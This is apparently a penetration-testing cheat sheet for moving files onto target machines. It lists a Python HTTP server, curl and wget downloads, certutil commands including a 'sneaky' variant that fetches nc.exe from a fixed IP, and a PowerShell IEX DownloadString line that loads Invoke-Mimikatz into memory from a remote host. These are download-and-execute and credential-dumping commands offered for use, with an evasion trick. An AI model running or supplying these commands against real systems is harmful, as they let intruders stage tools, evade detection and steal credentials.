File Transfer

Listeners and binaries

Host
python3 -m http.server 443

Client

curl
curl -o IP:Port/file
wget
wget IP:Port/file

Windows

First, start a python web server
python3 -m http.server 443
Then
certutil.exe -f -urlcache -split http://<IP>/<file>
Sneaky Version
certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe

In-memory execution

Mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')

Useful binaries

Last updated